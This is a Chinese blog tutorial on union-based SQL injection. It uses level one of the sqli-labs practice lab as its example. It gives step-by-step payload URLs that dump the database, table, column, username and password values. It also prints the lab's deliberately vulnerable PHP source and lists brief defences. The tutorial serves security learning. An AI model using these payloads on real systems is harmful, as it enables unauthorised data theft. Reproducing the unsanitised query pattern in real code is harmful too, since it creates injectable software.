SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)

最新推荐文章于 2024-07-11 00:29:01 发布
最新推荐文章于 2024-07-11 00:29:01 发布
阅读量2.5k 收藏 31
点赞数 8
分类专栏: CyberSecurity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/111410039
版权

SQL注入介绍

什么是SQL注入:
SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或者web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。

SQL注入的原理:
用户输入的数据被当作代码拼接到代码语句里面执行,造成一些不可估量的后果

危害:
你的数据被别人窃取,甚至被别人全部删除。

有输入输出的地方,就可能存在安全问题



SQL注入基础

  • 一个可利用的数据库
    information_schema
  • information_schema库的一些可利用的表

SCHEMATA表
schemata表存储该用户创建的所有数据库的库名。要记住该表中记录数据库库名的字段名为SCHEMA_NAME

TABLES表
TABLES表存储该用户创建的所有数据库的库名和表名
           字段名 table_name    table_schema

table_name存储这个数据库对应数据库名的里面的表的值
table_schema是储存了这个数据库所有数据库名的字段

COLUMNS表
COLUMNS表存储该用户创建的所有数据库的库名、表名和字段名
           字段名 table_schema   table_name   column_name

table_schema存的是数据库里面所有的数据库名
table_name对应数据库名的表名
column_name存储的是对应表名的字段名

在这里插入图片描述
在这里插入图片描述

mysql函数利用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 常见的注释符
    #或 - - 空格 或/**/
    内联注释:
    内联注释的形式:/*! code /。内联注释可以用于整个SQL语句中,用来执行我们的SQL语句

index.php?id=-15 /* ! UNION*/ /* ! SELECT*/ 1,2,3

/**/在mysql中是多行注释,但是里面如果加了感叹号!那么后面的内容会被执行(内联注释绕过)



SQL注入的种类:

介绍一些常见的几种手法吧!
在这里插入图片描述

1、union联合注入过程

第一步、测试注入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型
第二步、利用order by查表的列数
第三步、如有回显,找到回显位(回显,就是显示正在执行的批处理命令及执行的结果等)
第四步、利用union select 爆库、爆表、爆字段名、爆值

接下来以sql-lab第一关来演示一下union联合注入

sql-lab第一关:

在这里插入图片描述
输入id=1——》http://127.0.0.1/sqli/Less-1/?id=1
在这里插入图片描述
step1、测试注入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型

当加引号时:http://127.0.0.1/sqli/Less-1/?id=1’——》报错
在这里插入图片描述
当单引号后面添加注释符时:http://127.0.0.1/sqli/Less-1/?id=1%’ - -+(+表示空格) ——》成功,有回显
在这里插入图片描述
从这就可以判断它是一个字符型的,并且存在sql注入

step2、利用order by查表的列数

看一下表回显的列数,从1开始查起:http://127.0.0.1/sqli/Less-1/?id=1‘ order by --+
order by 1/2/3的时候都会成功回显(/表示或)
当输入order by 4的时候:
在这里插入图片描述
没有第四列,所以可以判断这个表有三列

step3、如有回显,找到回显位(回显位就是能够显示你查询信息的地方)

利用union select找回显位:
在这里插入图片描述
这里为什么是id=-1?因为id=-1时返回的是一张空表
然后用union select联合查询1,2,3它也会返回一张1,2,3的表,一张空表和一张带有1,2,3的表进行拼接,就会返回后面这张表(要保证前后两张表列数是一样的,这也是为什么要用order by 查询这张表有多少列的原因)
在这里插入图片描述
可以看到2和3这个位置可以回显我们的信息的

step4、利用union select 暴库、爆表、爆字段名、爆值

先爆库
利用database()来返回数据库(写在2或3的位置上都可以)
http://127.0.0.1/sqli/Less-1/?id=1‘ order by 1,2,database() --+
在这里插入图片描述
如果写成http://127.0.0.1/sqli/Less-1/?id=1‘ order by 1,database(),3 --+
在这里插入图片描述

可以发现它的数据库是security,找到它数据库名字之后,再去找表名
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
在这里插入图片描述
由上图可知security这个数据库存放了emails,referers,uagents, users这四张表


下面看一看users这个表有哪些字段名
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述
由上图可以发现user表中字段名有id,username,password


最后就是去爆这些字段名的数据(对应的值)
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(username) from users - -+
由下图可知有这些用户名在这里插入图片描述
同理要找密码的话:
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,group_concat(password) from users- -+
在这里插入图片描述

打开第一关后端语言的代码分析一下吧!
在这里插入图片描述

MYSQL中group_concat()/concat()/concat_ws/substr()函数

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述注意start是从1开始的

打开index.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

没有对用户输入的id进行过滤,导致我们想输入什么就输入什么
在这里插入图片描述
当输入id=-1’的时候把单引号闭合了

$sql=“SELECT * FROM users WHERE id= ’ $id’ union select XXXX #’LIMIT 0,1”;
上面语句中红色部分是我们传进去的值: $ id后面的那个单引号和前面那个单引号形成闭合, #将后面部分注释

防御措施
1、过滤危险字符
2、做到数据和代码分离

2、时间盲注

3、布尔盲注

4、堆叠注入

5、通过sql注入写webshell

Wαff1ε
关注
  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs系列——第一关
1匹黑马
04-26 3928
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sql注入 union联合查询注入(超详细
jiji_king的博客
04-04 1万+
sql注入 union联合查询注入 我们以sqli-labs的第一关为例,来具体理解union联合查询注入的方法,理解每一步我为什么要这么去做。 好的,我们开始第一关! 首先查看sqli-labs第一关 这是第一关初始界面,在url界面输入?id=1 发现有回显,给我们回显了两个数据 当我们输入?id=1’ 时出现了语法错误,表示这里可能存在语法漏洞,我们进一步探索 当我们输入 ?id=1’ --+ 时,又回显正常,然后我们用 ?id=1’ and 1=1–+ 回显正常,?id=1’ and 1=2–
sql注入联合详解
最新发布
2301_80679350的博客
07-11 1251
SQL 注入是一种常见的网络安全攻击方式,黑客利用它来篡改应用程序后台数据库的 SQL 查询,以实现非法目的。攻击者通过向应用程序的输入字段中插入恶意 SQL 代码,来执行未经授权的数据库操作。
sqli-labs-master 闯关第一关,单引号 ' 字符型注入
qq_39030256的博客
11-18 2684
sqli-labs-master第一关 注:%23为#的url编码 第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动...
sqli-labs第一关详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2409
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4936
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
sqllab 第一关
aliexiansheng的博客
10-22 511
一、正常访问 判断是否存在注入 http://127.0.0.1/sqllab/Less-1/?id=1' 标白部分为实际的报错内容,可以看出因为写入的’拼接到语句中造成原语句的单引号多余,导致报错。 通过添加的 – + 注释掉后续查询语句,达到语句正常执行的目的 二、猜解当前数据库列数以及页面中的显示位置 http://127.0.0.1/sqllab/Less-1/?id=1'order by 1 --+ http://127.0.0.1/sqllab/Less-1/?id=1'order by 2
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
SQLi-Lab:每个SQL注入实验室
03-29
SQLi-Lab是一个专门用于学习和练习SQL注入技术的平台,对于理解和防范这种攻击非常有帮助。 在"SQLi-Lab:每个SQL注入实验室"中,你可以期待以下的知识点: 1. **SQL注入基础**:了解SQL注入的基本原理,包括如何...
SQL-lab:sql注入全部解析
04-17
看看有哪几列可以回显在这里我输入了六列进行联合查询,但是显示没有六列,那么就截一半根据回显,我们发现,第二列和第三列是可以回显的现在我们就可以查到我们想要的内容查询数据库版本和库名称-1' union select 1...
第六节 GET报错注入-01
09-15
第六节的讨论聚焦于一种常见的安全漏洞,称为“GET报错注入”。报错注入是Web应用程序中的一个严重问题,它允许攻击者通过诱使系统产生错误消息来揭示敏感信息。这种攻击方式通常利用了应用程序对错误处理不当,使得...
web-其他注入和二次注入
07-15
首先,我们来看Sqli-lab24中的“关二次注入”。二次注入(Second-order Injection)是指恶意数据被存储在数据库中,然后在稍后的查询中被重新使用,从而触发注入攻击。在例子中,攻击者尝试更新用户密码的SQL语句...
SQL注入union联合注入
hobby云说
06-12 3627
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
sqli联合注入基本步骤
sfmvp的博客
08-26 336
SQL注入基本步骤 : 1、注入测试 2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、爆数据库名 6、爆数据库表名 7、爆字段名 8,爆数据 1,注入点判断:/?id=1 and 1=1 2,判断闭合方式:/?id=1' {' ,'), ","),), )).} 注释符:--+ # -- (空格) 3,猜字段数:/?id=1 order by 数字 4,判断显示位:/?id=-1 union select 1,2,3,4,······ 5,根据页面回显...
union注入
weixin_43858799的博客
04-01 519
一、union注入 基于union的信息获取: union联合查询:可以通过联合查询来查询指定的数据 用法举例: select username,password from user where id =1 union select 字段1,字段2 from 表名 先登入PHPmyadmin 进入pikachu的数据库中 得到此结果 上述为一般查询 union查询: 除了通过遍历查询数...
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 886
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
sql注入暴库是什么意思
12-14
SQL注入暴库是指攻击者通过利用SQL注入漏洞,成功获取到数据库中所有的表名、字段名、数据等信息的过程。攻击者可以通过暴库获取到敏感信息,例如用户的账号、密码等,从而进一步进行攻击。为了防止SQL注入暴库攻击,需要在应用程序中对用户输入的数据进行严格的过滤和验证,避免恶意注入攻击。 以下是一个简单的SQL注入暴库的例子: 假设有一个登录页面,用户输入用户名和密码,后台使用以下SQL语句进行验证: ```sql SELECT * FROM users WHERE username='输入的用户名' AND password='输入的密码' ``` 攻击者可以通过在用户名输入框中输入以下内容进行SQL注入暴库攻击: ```sql ' union select null,table_name from information_schema.tables # ``` 这个语句的作用是将原本的SQL语句改写成查询数据库中所有表名的语句。其中,#表示注释掉原本的密码验证部分,使得后面的语句可以正常执行。攻击者可以通过类似的方式获取到数据库中的其他信息,例如字段名、数据等。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值